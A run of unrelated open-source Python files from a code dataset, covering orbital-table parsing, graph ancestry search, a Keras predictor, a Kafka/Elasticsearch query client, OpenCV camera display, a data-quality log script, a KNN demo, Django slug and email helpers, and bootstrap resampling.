\"molecular orbital coefficients:\" in line.lower():\r\n MO_table_start_idx = idx+1\r\n \r\n elif \"Density Matrix:\" in line:\r\n MO_table_end_idx = idx\r\n break\r\n\r\n\r\n### Fix orbital symmetries\r\noccupied_symm_lines[0] = occupied_symm_lines[0].split(\"Occupied \")[1]\r\nvirtual_symm_lines[0] = virtual_symm_lines[0].split(\"Virtual \")[1]\r\n\r\n### flatten into lists of symmetries\r\noccupied_symm = [item for sublist in map(lambda x: x.strip().split(\" \"), occupied_symm_lines) for item in sublist]\r\nvirtual_symm = [item for sublist in map(lambda x: x.strip().split(\" \"), virtual_symm_lines) for item in sublist]\r\n\r\nnumber_occupied_orbitals: int = len(occupied_symm)\r\nnumber_virtual_orbitals: int = len(virtual_symm)\r\n#print(number_occupied_orbitals + number_virtual_orbitals)\r\n\r\n\r\n### What orbitals are wanted?\r\nif orbitals == ['']:\r\n wanted_orbitals = [x for x in range(number_occupied_orbitals + number_virtual_orbitals)]\r\nelif len(orbitals) > 0:\r\n wanted_orbitals: List[int] = []\r\n for x in orbitals:\r\n if x.lower() == \"homo\":\r\n wanted_orbitals.append(number_occupied_orbitals)\r\n elif x.lower() == \"lumo\":\r\n wanted_orbitals.append(number_occupied_orbitals+1)\r\n else:\r\n wanted_orbitals.append(int(x))\r\nelse:\r\n raise Exception(\"something went wrong with wanted_orbitals\")\r\n\r\n####################################\r\n### Grab the molecular orbital table\r\n####################################\r\n\r\ndata = {}\r\n\r\ndef saveData(MO_numbers\r\n , isOccupied\r\n , eigenvalues\r\n , atomic_data):\r\n \"\"\"\r\n molname_Molecular_orbitals.json --> {\r\n MO_number : { \r\n , occupied : bool\r\n , eigenvalue : float\r\n , atomic_contributions: [\r\n atom_number : {\r\n , atom_symbol : str\r\n , atomic_orbitals : [\r\n {\r\n atomic_orbital_number : int\r\n , orbital_symbol : str\r\n , energy : float\r\n }\r\n , ...\r\n ]\r\n },\r\n ...\r\n ]\r\n }\r\n , ...\r\n }\r\n \"\"\"\r\n MO_data = {\r\n\r\n }\r\n\r\n ### Process atomic data\r\n atomic_data_T = np.array(atomic_data).T\r\n for idx, MO_number in enumerate(MO_numbers):\r\n MO_data[MO_number] = {\r\n \"occupied\" : isOccupied[idx]\r\n , \"eigenvalue\": eigenvalues[idx]\r\n , \"atomic_contributions\" : {}\r\n }\r\n for row in atomic_data:\r\n (\r\n ao_number\r\n , atom_number\r\n , atom_symbol\r\n , ao_symbol\r\n , a_contributions\r\n ) = row\r\n for idx, energy in enumerate(a_contributions):\r\n mo_num = MO_numbers[idx]\r\n \r\n if atom_number not in MO_data[mo_num][\"atomic_contributions\"]:\r\n MO_data[mo_num][\"atomic_contributions\"][atom_number] = {}\r\n \r\n if \"atom_symbol\" not in MO_data[mo_num][\"atomic_contributions\"][atom_number]:\r\n MO_data[mo_num][\"atomic_contributions\"][atom_number][\"atom_symbol\"] = atom_symbol\r\n \r\n if \"atomic_orbitals\" not in MO_data[mo_num][\"atomic_contributions\"][atom_number]:\r\n MO_data[mo_num][\"atomic_contributions\"][atom_number][\"atomic_orbitals\"] = [{\r\n \"atomic_orbital_number\" : ao_number\r\n , \"orbital_symbol\" : ao_symbol\r\n , \"energy\" : energy\r\n }]\r\n else:\r\n MO_data[mo_num][\"atomic_contributions\"][atom_number][\"atomic_orbitals\"].append({\r\n \"atomic_orbital_number\" : ao_number\r\n , \"orbital_symbol\" : ao_symbol\r\n , \"energy\" : energy\r\n })\r\n\r\n\r\n\r\n data.update(MO_data)\r\n\r\ndef any_in(l1: List, l2:List):\r\n for el in l1:\r\n if el in l2:\r\n return True\r\n return False \r\n\r\n### WE ARE ASSUMING THAT the Number of MO orbitals will be the number of atomic orbitals\r\nif not MO_table_start_idx:\r\n raise Exception(\"No start index for MO table\")\r\nif not MO_table_end_idx:\r\n raise Exception(\"No end index for MO table\")\r\n\r\n### Define regex patterns\r\nm_orb_num_pattern = re.compile(r\" {5,}([\\d ][\\d ]\\d +){1,5}\")\r\neigenvalues_pattern = re.compile(r\" Eigenvalues -- \")\r\nisOccupied_pattern = re.compile(r\" {5,}([^\\d\\W] {9})+\")\r\na_orbital_pattern = re.compile(r\"^[\\d ]{1,3}\\d [\\d ]{1,3} [\\w ]{2} \\d\\w[\\w ] \")\r\n\r\n\r\nMO_table_lines = fileContent[MO_table_start_idx:MO_table_end_idx]\r\n\r\nMO_numbers = None\r\neigenvalues = None\r\nisOccupied = None\r\natomic_data = []\r\nfor line in MO_table_lines:\r\n\r\n ### Match MO number line\r\n if m_orb_num_pattern.match(line):\r\n if MO_numbers:\r\n ### TODO: save data from this chunk before starting next chunk\r\n saveData(MO_numbers, isOccupied, eigenvalues, atomic_data)\r\n atomic_data = []\r\n \r\n MO_numbers = [int(x) for x in line.strip().split()]\r\n if not any_in(MO_numbers, wanted_orbitals):\r\n MO_numbers = None\r\n\r\n ### Match eigenvalues line\r\n elif eigenvalues_pattern.match(line) and MO_numbers:\r\n eigenvalues = [float(x) for x in line[23:].split()]\r\n\r\n ### Match isOccupied line\r\n elif isOccupied_pattern.match(line) and MO_numbers:\r\n isOccupied = [True if x.lower() == \"o\" else False for x in line.strip().split()]\r\n pass\r\n\r\n ### Match atomic orbital contribution line\r\n elif a_orbital_pattern.match(line) and MO_numbers:\r\n ### TODO: split into relevant columns of information\r\n ao_number = int(line[0:4])\r\n tmp_atom_num = line[5:8]\r\n if tmp_atom_num.strip() == '':\r\n tmp_atom_num = atom_num\r\n else:\r\n tmp_atom_num = int(tmp_atom_num)\r\n atom_num = int(tmp_atom_num)\r\n tmp_atom_symbol = line[9:11]\r\n if tmp_atom_symbol.strip() == \"\":\r\n tmp_atom_symbol = atom_symbol\r\n else:\r\n tmp_atom_symbol = tmp_atom_symbol.strip()\r\n atom_symbol = tmp_atom_symbol\r\n ao_symbol = line[12:15].strip()\r\n energies = [float(x) for x in line[16:].split()]\r\n row = [ao_number, tmp_atom_num, tmp_atom_symbol, ao_symbol, energies]\r\n atomic_data.append(row)\r\n\r\n### TODO: save the last chunk\r\nif MO_numbers:\r\n saveData(MO_numbers, isOccupied, eigenvalues, atomic_data)\r\n\r\n#############################\r\n# Save atomic coordinates\r\n#############################\r\ndata[\"atomic_coords\"] = atomic_coords\r\n\r\njson.dump(data, sys.stdout)","sub_path":"y4_python/parse_orbitals.py","file_name":"parse_orbitals.py","file_ext":"py","file_size_in_byte":10495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"205646633","text":"\nclass Stack:\n def __init__(self):\n self.stack = []\n\n def push(self, value):\n return self.stack.append(value)\n\n def pop(self):\n if self.size() > 0:\n return self.stack.pop()\n else:\n return None\n\n def size(self):\n return len(self.stack)\n\ndef earliest_ancestor(ancestors, starting_node):\n dict_ancestor = {}\n stack = Stack()\n visited = set()\n longest_path = []\n\n for i, x in enumerate(ancestors):\n dict_ancestor[i] = x\n\n for i, v in dict_ancestor.items():\n if v[1] is starting_node:\n stack.push([i])\n\n\n size = stack.size()\n\n if stack.size() > 0:\n while size > 0:\n # print(dict_ancestor)\n # print(stack.stack)\n current_node = stack.pop()\n single_node = current_node[-1]\n size = stack.size()\n\n if single_node not in visited:\n # print(\"sn not in visited\")\n visited.add(single_node)\n parent = dict_ancestor[single_node][0]\n # print(parent)\n\n for i, v in dict_ancestor.items():\n if v[1] is parent:\n new_path = current_node[:]\n new_path.append(i)\n stack.push(new_path)\n # print(\"new_path:\", new_path)\n\n if len(new_path) > len(longest_path):\n longest_path = new_path\n elif i == len(dict_ancestor) - 1:\n longest_path = current_node\n\n\n size = stack.size()\n\n final_answer = (dict_ancestor[longest_path[-1]][0])\n return final_answer \n else:\n return -1\n\n","sub_path":"projects/ancestor/ancestor.py","file_name":"ancestor.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"556350222","text":"from keras.models import load_model\nfrom keras.utils import to_categorical\nfrom collections import Counter\nimport numpy as np\n\nmd=load_model(\"../model/dynamic_model.h5\")\n\nID_MAP_DICT={}\nID_MAP_DICT2={}\nID_MAP_TOTAL=1\n\nSEQLEN=5\nNAME_TYPE=32\n\nCUR_MAPPD_ID=1\n\nDELTA_COUNTER=Counter()\n\nCUR_DELTA=[1]*5\n\n\n# 输入为int\n# 输出为当前预测的int\n# 输出说明: 0: 表示没有预测成功\n# 其他: 表示当前预测的int,而且此int 之前一定出现过\n# 例如: ypred=dynamic_predict(12)\n\ndef dynamic_predict(id_in):\n global ID_MAP_DICT,ID_MAP_TOTAL,ID_MAP_DICT2,md\n\n id_map=1\n if id_in in ID_MAP_DICT:\n id_map=ID_MAP_DICT[id_in]\n else:\n ID_MAP_DICT[id_in]=ID_MAP_TOTAL\n ID_MAP_DICT2[ID_MAP_TOTAL]=id_in\n id_map=ID_MAP_TOTAL\n ID_MAP_TOTAL+=1\n\n global CUR_MAPPD_ID,DELTA_COUNTER,SEQLEN,NAME_TYPE,CUR_DELTA\n delta=id_map-CUR_MAPPD_ID\n CUR_MAPPD_ID=id_map\n DELTA_COUNTER[delta]+=1\n\n delta_map={}\n delta_map2={}\n total=1\n for i in DELTA_COUNTER.most_common(31):\n delta_map[i[0]]=total\n delta_map2[total]=i[0]\n total+=1\n\n cur_delta=[]\n for i in CUR_DELTA:\n if i in delta_map:\n cur_delta.append(delta_map[i])\n else:\n cur_delta.append(0)\n\n CUR_DELTA=CUR_DELTA[1:]\n CUR_DELTA.append(delta)\n\n if delta in delta_map:\n delta=delta_map[delta]\n else:\n delta=0\n\n\n x=to_categorical([cur_delta],num_classes=NAME_TYPE)\n y=to_categorical([delta],num_classes=NAME_TYPE)\n\n md.fit(x,y,batch_size=1,epochs=1,verbose=0)\n\n\n cur_delta=[]\n for i in CUR_DELTA:\n if i in delta_map:\n cur_delta.append(delta_map[i])\n else:\n cur_delta.append(0)\n\n x=to_categorical([cur_delta],num_classes=NAME_TYPE)\n\n pred=md.predict(x,verbose=0)[0]\n ypred=np.argmax(pred)\n\n\n if ypred in delta_map2:\n temp=delta_map2[ypred]+CUR_MAPPD_ID\n if temp in ID_MAP_DICT2:\n return ID_MAP_DICT2[temp]\n\n else: return 0\n else: return 0\n","sub_path":"DFS/predict_1/src/dynamic_predict.py","file_name":"dynamic_predict.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"177155975","text":"\"\"\"\nClient for pushing elasticsearch queries into a kafka topic and reading results\nback from a second kafka topic. This runs on the analytics side as part of feature\ncollection.\n\"\"\"\n\nimport base64\nfrom collections import namedtuple\nimport json\nimport os\nimport time\n\nimport kafka\n\nimport mjolnir.spark\nimport mjolnir.kafka\n\n# Kafka client configuration\nClientConfig = namedtuple('ClientConfig', [\n 'brokers', 'req_topic', 'resp_topic', 'control_topic'])\n# 4 fields and 3 defaults means brokers is still required.\n# TODO: This is basically a hack, mypy doesn't like it. Remove?\nClientConfig.__new__.__defaults__ = ( # type: ignore\n mjolnir.kafka.TOPIC_REQUEST,\n mjolnir.kafka.TOPIC_RESULT,\n mjolnir.kafka.TOPIC_COMPLETE)\n\n# A specific range of a kafka.TopicPartition\nOffsetRange = namedtuple('OffsetRange', ['tp', 'start', 'end'])\n\n\ndef _make_producer(client_config):\n return kafka.KafkaProducer(bootstrap_servers=client_config.brokers,\n compression_type='gzip')\n\n\ndef ratelimit(rows, rate, clock=time.monotonic):\n \"\"\"Apply per-second rate limit to iterable.\n\n Parameters\n ----------\n rows : iterable\n rate : int\n Number of rows to allow through per second\n clock : callable\n 0-arity function returning current time in seconds\n \"\"\"\n next_reset = clock() + 1\n num_rows = 0\n for row in rows:\n time_remaining = next_reset - clock()\n if time_remaining < 0 or num_rows >= rate:\n if time_remaining > 0:\n time.sleep(time_remaining)\n num_rows = 0\n next_reset = clock() + 1\n num_rows += 1\n yield row\n\n\ndef produce_queries(\n df, client_config, run_id, create_es_query, meta_keys,\n max_concurrent_producer=20, rate_limit_per_sec=1500\n):\n \"\"\"Push msearch queries into kafka.\n\n Write out the dataframe rows to kafka as elasticsearch multi-search queries.\n These will be picked up by the msearch daemon, and the collected back in\n the collect_results function.\n\n Parameters\n ----------\n df : pyspark.sql.DataFrame\n Source data frame to collect feature vectors for\n client_config : ClientConfig\n run_id : str\n A unique identifier for this data collection run\n create_es_query : callable\n Function accepting a row from df that returns a string\n containing an elasticsearch query.\n meta_keys : list of str\n List of Row fields to include in the message metadata. These\n will be returned when consuming responses.\n max_concurrent_producer : int\n Maximum number of concurrent producers to use. This helps keep\n unnecessary load off of the kafka clusters.\n rate_limit_per_sec : int\n Maximum number of records to produce per second to kafka\n across all producers\n\n Returns\n -------\n int\n The number of end run sigils to wait for in the complete topic.\n \"\"\"\n\n meta_keys = set(meta_keys)\n # If we have less than max_concurrent_producer partitions this\n # wont change anything.\n rdd = df.rdd.coalesce(max_concurrent_producer)\n # No guarantee spark will run all of the partitions concurrently,\n # but set the per-partition rate limit assuming all of them are.\n partition_rate_limit = rate_limit_per_sec / rdd.getNumPartitions()\n\n def produce_partition(rows):\n producer = _make_producer(client_config)\n for row in ratelimit(rows, partition_rate_limit):\n producer.send(client_config.req_topic, json.dumps({\n 'run_id': run_id,\n 'request': create_es_query(row),\n 'meta': {k: v for k, v in row.asDict().items() if k in meta_keys},\n }).encode('utf8'))\n producer.close()\n\n mjolnir.spark.assert_columns(df, meta_keys)\n rdd.foreachPartition(produce_partition)\n\n # Send a sigil value to indicate this run is complete. The consumer will copy this\n # into TOPIC_COMPLETE so we know it's done.\n producer = _make_producer(client_config)\n partitions = producer.partitions_for(client_config.req_topic)\n for p in partitions:\n producer.send(client_config.req_topic, partition=p, value=json.dumps({\n 'run_id': run_id,\n 'complete': True,\n 'partition': p\n }).encode('utf8'))\n producer.close()\n return len(partitions)\n\n\ndef offsets_for_times(consumer, partitions, timestamp):\n \"\"\"Augment KafkaConsumer.offsets_for_times to not return None\n\n Parameters\n ----------\n consumer : kafka.KafkaConsumer\n This consumer must only be used for collecting metadata, and not\n consuming. API's will be used that invalidate consuming.\n partitions : list of kafka.TopicPartition\n timestamp : number\n Timestamp, in seconds since unix epoch, to return offsets for.\n\n Returns\n -------\n dict from kafka.TopicPartition to integer offset\n \"\"\"\n # Kafka uses millisecond timestamps\n timestamp_ms = int(timestamp * 1000)\n response = consumer.offsets_for_times({p: timestamp_ms for p in partitions})\n offsets = {}\n for tp, offset_and_timestamp in response.items():\n if offset_and_timestamp is None:\n # No messages exist after timestamp. Fetch latest offset.\n consumer.assign([tp])\n consumer.seek_to_end(tp)\n offsets[tp] = consumer.position(tp)\n else:\n offsets[tp] = offset_and_timestamp.offset\n return offsets\n\n\ndef offset_range_for_timestamp_range(brokers, start, end, topic):\n \"\"\"Determine OffsetRange for a given timestamp range\n\n Parameters\n ----------\n client_config : ClientConfig\n start : number\n Unix timestamp in seconds\n end : number\n Unix timestamp in seconds\n topic : str\n Topic to fetch offsets for\n\n Returns\n -------\n list of OffsetRange or None\n Per-partition ranges of offsets to read\n \"\"\"\n consumer = kafka.KafkaConsumer(bootstrap_servers=brokers)\n partitions = consumer.partitions_for_topic(topic)\n if partitions is None:\n # Topic does not exist.\n return None\n partitions = [kafka.TopicPartition(topic, p) for p in partitions]\n o_start = offsets_for_times(consumer, partitions, start)\n o_end = offsets_for_times(consumer, partitions, end)\n return [OffsetRange(tp, o_start[tp], o_end[tp]) for tp in partitions]\n\n\ndef wait_for_sigils(client_config, run_id, num_end_sigils):\n \"\"\"Wait for the end run sigils to be reflected\n\n The 'end run' message gets reflected, by the client running the msearch\n daemon, back into TOPIC_COMPLETE into all partitions. This waits until\n all sigils that were sent have been reflected, indicating everything sent\n before the sigil has been processed and is available in the result topic.\n\n Parameters\n ----------\n client_config : ClientConfig\n run_id : str\n Unique identifier for this run\n num_end_sigils : int\n The number of unique end run sigils to expect. This should be the number of partitions\n of the topic requests were produced to.\n \"\"\"\n consumer = kafka.KafkaConsumer(bootstrap_servers=client_config.brokers,\n # The topic we are reading from is very low volume,\n # containing only reflected end run sigils. To make\n # sure we don't miss one start at the beginning.\n auto_offset_reset='earliest',\n value_deserializer=lambda x: json.loads(x.decode('utf8')))\n parts = consumer.partitions_for_topic(client_config.control_topic)\n if parts is None:\n raise RuntimeError(\"topic %s missing\" % client_config.control_topic)\n\n # Tracks the sigils that have been seen for the request topics\n # Uses a set incase duplicate messages are sent somehow, to ensure\n # we see a message for all expected partitions\n seen_sigils = set()\n consumer.subscribe([client_config.control_topic])\n try:\n for message in consumer:\n if 'run_id' in message.value and message.value['run_id'] == run_id and 'complete' in message.value:\n print('found sigil for run %s and partition %d' % (message.value['run_id'], message.value['partition']))\n seen_sigils.add(message.value['partition'])\n # Keep reading until all sigils have been reflected.\n if len(seen_sigils) >= num_end_sigils:\n return\n raise RuntimeError(\"Finished consuming, but %d partitions remain\" % (num_end_sigils - len(seen_sigils)))\n finally:\n consumer.close()\n\n\ndef kafka_to_rdd(sc, client_config, offset_ranges):\n \"\"\"Read ranges of kafka partitions into an RDD.\n\n Parameters\n ----------\n sc : pyspark.SparkContext\n client_config : ClientConfig\n offset_ranges : list of OffsetRange\n List of topic partitions along with ranges to read. Start\n and end of range are inclusive.\n\n Returns\n -------\n pyspark.RDD\n Contents of the specified offset_ranges\n \"\"\"\n def read_offset_range(offset_range):\n if offset_range.end <= offset_range.start:\n # Raise exception?\n return\n # After serialization round trip these fail an isinstance check.\n # re-instantiate so we have the expected thing.\n tp = kafka.TopicPartition(*offset_range.tp)\n consumer = kafka.KafkaConsumer(bootstrap_servers=client_config.brokers,\n value_deserializer=lambda x: json.loads(x.decode('utf8')))\n try:\n consumer.assign([tp])\n consumer.seek(tp, offset_range.start)\n while True:\n poll_response = consumer.poll(timeout_ms=10000)\n if poll_response and tp in poll_response:\n for message in poll_response[tp]:\n if message.offset > offset_range.end:\n break\n yield message.value\n if consumer.position(tp) >= offset_range.end:\n break\n finally:\n consumer.close()\n\n return (\n # TODO: This isn't the same as assigning each offset_range to a separate\n # partition, but it doesn't seem like pyspark allows us to do that. Often\n # enough this seems to achieve the same thing, but without guarantees.\n sc.parallelize(offset_ranges, len(offset_ranges))\n .flatMap(read_offset_range)\n )\n\n\ndef collect_results(sc, client_config, receive_record, start, end, run_id):\n \"\"\"\n Parameters\n ----------\n sc : pyspark.SparkContext\n client_config : ClientConfig\n receive_record : callable\n Callable receiving a json decoded record from kafka. It should return\n a list and the resulting rdd will have a record per result returned.\n start : int\n Timestamp, in seconds since unix epoch, at which to start looking for records\n end : int\n Timestamp at which to stop looking for records.\n run_id : str\n unique identifier for this run\n\n Returns\n -------\n pyspark.RDD\n RDD containing results of receive_record\n \"\"\"\n # Decide what offsets we need.\n offset_ranges = offset_range_for_timestamp_range(\n client_config.brokers, start, end, client_config.resp_topic)\n if offset_ranges is None:\n raise RuntimeError('Could not retrieve offset ranges for result topic. Does it exist?')\n\n # If this ends up being too much data from kafka, blowing up memory in the\n # spark executors, we could chunk the offsets and union together multiple RDD's.\n return (\n kafka_to_rdd(sc, client_config, offset_ranges)\n .filter(lambda rec: 'run_id' in rec and rec['run_id'] == run_id)\n .flatMap(receive_record))\n\n\ndef msearch(df, client_config, meta_keys, create_es_query, handle_response):\n \"\"\"Run an msearch against each row of the input dataframe\n\n Parameters\n ----------\n df : pyspark.sql.DataFrame\n client_config : ClientConfig\n Configuration of brokers and topics to communicate with\n meta_keys : list of str\n List of fields in df to pass through to handle_response\n create_es_query : callable\n Transform row from df into a valid elasticsearch bulk request. This\n must be a str ready for POST exactly following the msearch spec.\n handle_response : callable\n Processes individual responses from elasticesarch. A single dict argument\n is provided with the keys `status_code`, `text` and `meta`. Status code is\n the http status code. Text contains the raw text result. Meta is a dict\n containing the key/value pairs from meta_keys.\n\n Returns\n -------\n pyspark.RDD\n The result of running msearch on the input. The shape is determined\n by the results of the `handle_response` argument\n \"\"\"\n # assumes client_config was a list of brokers to connect to\n # and the topics take defaults\n if not isinstance(client_config, ClientConfig):\n client_config = ClientConfig(client_config)\n\n run_id = base64.b64encode(os.urandom(16)).decode('ascii')\n # Adjust the start/end times by one minute to give a little flexibility in data arriving.\n start = time.time() - 60\n num_end_sigils = produce_queries(df, client_config, run_id, create_es_query, meta_keys)\n wait_for_sigils(client_config, run_id, num_end_sigils)\n end = time.time() + 60\n return collect_results(df._sc, client_config, handle_response, start, end, run_id)\n","sub_path":"mjolnir/kafka/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":13595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"566101454","text":"import numpy as np\nimport cv2\ncap = cv2.VideoCapture(0)\nwhile(True):\n \n ret, frame = cap.read()\n r,c,ch = frame.shape\n frame = cv2.resize(frame.copy(),(int(c/2),int(r/2)))\n print(frame.shape)\n # b,g,r = cv2.split(frame)\n # cv2.imshow('Red',r)\n # cv2.imshow('Blue',b)\n # cv2.imshow('Green',g)\n # img = cv2.merge((b,g,r))\n # gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n # cv2.imshow('Gray',gray)\n cv2.imshow('frame',frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"open_camera.py","file_name":"open_camera.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"617640784","text":"'''\nCreated on Oct 4, 2017\n\n@author: goktug.yorulmaz\n'''\n\nimport time\n\nimport Utilities\n\nToday=time.strftime (\"%d_%m_%y\") \n\nf=open('C:\\Data_Quality\\Permits.csv', mode=\"r\")\n\nPermitId=Utilities.RetrieveIntoDictionary(f,'\\t',1,header=0)\n\nf=open('C:\\Data_Quality\\Permits_Answers.csv', mode=\"r\")\n\nPermitId_Answers=Utilities.RetrieveIntoDictionary(f, '\\t',1,header=0)\n\nlogfile=open(\"C:\\Data_Quality\\Permit_Data_Quality_\"+Today+\".log\",mode='w')\n \nlogfile.write(\"Completed Retrieving Answer Key And New Permit Entries Into Dictionaries \\n\") \n\nfor key in PermitId_Answers:\n try:\n Answer=PermitId_Answers[key]\n Permits=PermitId[key] \n \n iterator=0\n for x in Answer:\n if(Answer[iterator]!=Permits[iterator]):\n if(iterator==0):\n column=\"State\"\n elif(iterator==2):\n column=\"WellID\" \n elif(iterator==3): \n column=\"ApprovedDate\" \n elif(iterator==4): \n column=\"DLSSurfaceCoordinates\"\n elif(iterator==5): \n column=\"FilingPurposeId\"\n elif(iterator==6): \n column=\"NavportPermitId\" \n elif(iterator==7): \n column=\"CompletionOperatorId\" \n elif(iterator==8): \n column=\"OperatorNumber\"\n elif(iterator==9): \n column=\"PermitNumber\" \n elif(iterator==10): \n column=\"SubmittedDate\"\n elif(iterator==11): \n column=\"TotalDepth\" \n elif(iterator==12): \n column=\"TrajectoryId\" \n elif(iterator==13): \n column=\"ValidUntil\" \n elif(iterator==14): \n column=\"WellNumber\" \n elif(iterator==15): \n column=\"dateinserted\" \n elif(iterator==16): \n column=\"CompletionOperatorIdNonStandardized\" \n elif(iterator==17): \n column=\"WellName\" \n elif(iterator==18): \n column=\"MineralRightsId\" \n elif(iterator==19): \n column=\"PermitAPI\" \n elif(iterator==20): \n column=\"WellClassificationId\" \n elif(iterator==21): \n column=\"TargetedHydrocarbonId\" \n elif(iterator==22): \n column=\"CompletionId\"\n elif(iterator==23): \n column=\"LeaseId\" \n elif(iterator==24): \n column=\"SpudDate\"\n elif(iterator==25): \n column=\"FormationId\"\n elif(iterator==26): \n column=\"FieldId\" \n \n logfile.write(\"There was a mismatch at PermitID \"+key+\" with respect to column \"+column +\"\\n\")\n logfile.write(\"Answer key entry was \"+Answer[iterator]+\" present entry is \"+Permits[iterator]+\"\\n\")\n iterator=iterator+1 \n \n except Exception as e:\n print(\"The exception is :\"+ str(e))\n logfile.write(\"The exception is :\"+ str(e)+\"\\n\")\n print(\"The following PermitID :\"+key+\" was not found\") \n logfile.write(\"The following PermitID :\"+key+\" was not found \\n\")\n \n \n\nif __name__ == '__main__':\n pass","sub_path":"Data_Quality/Prism_Data_Quality/Archived/Permit_Changes.py","file_name":"Permit_Changes.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"284877358","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 2 13:02:24 2020\n\n@author: Victor\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom knn import KNN\n\n# x(n)--< Peso kg,Est. mtrs >---\nx1=np.array([[49],[1.43]]) # ninos\nx2=np.array([[51],[1.55]])\nx3=np.array([[57],[1.58]])\nx4=np.array([[47],[1.55]])\nx5=np.array([[54],[1.60]])\nx6=np.array([[56],[1.58]])\nx7=np.array([[59],[1.64]])\nx8=np.array([[53],[1.61]])\nx9=np.array([[58],[1.63]])\nx10=np.array([[52],[1.60]]) # adultos\nx11=np.array([[75],[1.73]])\nx12=np.array([[80],[1.75]])\nx13=np.array([[75],[1.69]])\nx14=np.array([[65],[1.71]])\nx15=np.array([[75],[1.79]])\nx16=np.array([[77],[1.76]])\nx17=np.array([[65],[1.71]])\nx18=np.array([[70],[1.70]])\nx19=np.array([[78],[1.81]])\nx20=np.array([[70],[1.67]])\n\nc0=np.zeros(10) \nc1=np.ones(10)\n\nX=np.concatenate((x1,x2,x3,x4,x5,x6,x7,x8,x9,x10,x11,x12,x13,x14,x15,x16,x17,x18,x19,x20),axis=1)\nC=np.concatenate((c0,c1),axis=0)\nC=np.uint8(C)\n\n# nuevos datos a clasificar con KNN\ny1=np.array([[62],[1.73]])\ny2=np.array([[70],[1.78]])\ny3=np.array([[53],[1.68]])\nY=np.concatenate((y1,y2,y3),axis=1)\n\nfor i in range(X.shape[1]):\n if C[i]==0:\n marcar='v'\n color='red'\n else:\n marcar='o'\n color='blue'\n plt.scatter(x=X[0,i],y=X[1,i],c=color,s=100,marker=marcar)\n\nfor j in range(Y.shape[1]):\n plt.scatter(x=Y[0,j],y=Y[1,j],c='black',s=100,marker='s')\n\nplt.xlabel('Peso (kg)')\nplt.ylabel('Estatura (m)')\nplt.title('Clasificador KNN')\nplt.legend()\n\n# iniciar KNN\nclasificador = KNN(k=15)\nclasificador.aprendizaje(X,C) # fase de aprendizaje\nclasificar = clasificador.clasificacion(Y)\nprint('clases de los puntos y(n): ',clasificar)\n","sub_path":"ejemplo_knn.py","file_name":"ejemplo_knn.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"61128209","text":"import random\nimport smtplib\nimport string\n\nfrom django.utils.text import slugify\n\n\n\ndef random_string_generator(size=10, chars=string.ascii_lowercase + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))\n\n\ndef unique_user_slug_generator(instance, new_slug=None):\n \"\"\"\n This is for a Django project and it assumes your instance\n has a model with a slug field and a title character (char) field.\n \"\"\"\n slug = new_slug if new_slug is not None else slugify(instance.username)\n Klass = instance.__class__\n qs_exists = Klass.objects.filter(slug=slug).exists()\n if qs_exists:\n new_slug = \"{slug}-{randstr}\".format(\n slug=slug,\n randstr=random_string_generator(size=4)\n )\n return unique_slug_generator(instance, new_slug=new_slug)\n return slug\n\n\ndef unique_slug_generator(instance, new_slug=None):\n \"\"\"\n This is for a Django project and it assumes your instance\n has a model with a slug field and a title character (char) field.\n \"\"\"\n slug = new_slug if new_slug is not None else slugify(instance.name)\n Klass = instance.__class__\n qs_exists = Klass.objects.filter(slug=slug).exists()\n if qs_exists:\n new_slug = \"{slug}-{randstr}\".format(\n slug=slug,\n randstr=random_string_generator(size=4)\n )\n return unique_slug_generator(instance, new_slug=new_slug)\n return slug\n\n\ndef send_email(user, password, recipient, subject, body):\n\n gmail_user = user\n gmail_pwd = password\n FROM = user\n TO = recipient if type(recipient) is list else [recipient]\n SUBJECT = subject\n TEXT = body\n\n # Prepare actual message\n message = f\"\"\"From: {FROM}\\nTo: {\", \".join(TO)}\\nSubject: {SUBJECT}\\n\\n{TEXT}\n \"\"\"\n\n server = smtplib.SMTP(\"smtp.gmail.com\", 587)\n server.ehlo()\n server.starttls()\n server.login(gmail_user, gmail_pwd)\n server.sendmail(FROM, TO, message)\n print(\"email sent!\")\n server.close()","sub_path":"helpers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"126929998","text":"#!/bin/python\nimport pandas as pd\nimport random\n\ndef bootstrap_znz(target_train,data_train,znz_ratio=1):\n zeros = []\n nonzeros = []\n for index, row in target_train.iteritems():\n if row:\n nonzeros += [index]\n else:\n zeros += [index]\n #print \"nonzeros = \",len(nonzeros), \"; zeros = \", len(zeros)\n bootstrap_target_train = pd.Series()\n bootstrap_data_train = pd.DataFrame(columns= data_train.columns)\n n_bootstrap_samples = len(nonzeros)+int((len(zeros)-len(nonzeros))*znz_ratio)\n samples = []\n for i in range(n_bootstrap_samples):\n samples += [random.choice(nonzeros)]\n bootstrap_target_train = bootstrap_target_train.append(target_train[samples])\n bootstrap_data_train = bootstrap_data_train.append(data_train.ix[samples,:])\n target_train.drop(nonzeros,inplace=1)\n data_train.drop(nonzeros,inplace=1)\n target_train = target_train.append(bootstrap_target_train)\n data_train = data_train.append(bootstrap_data_train)\n return 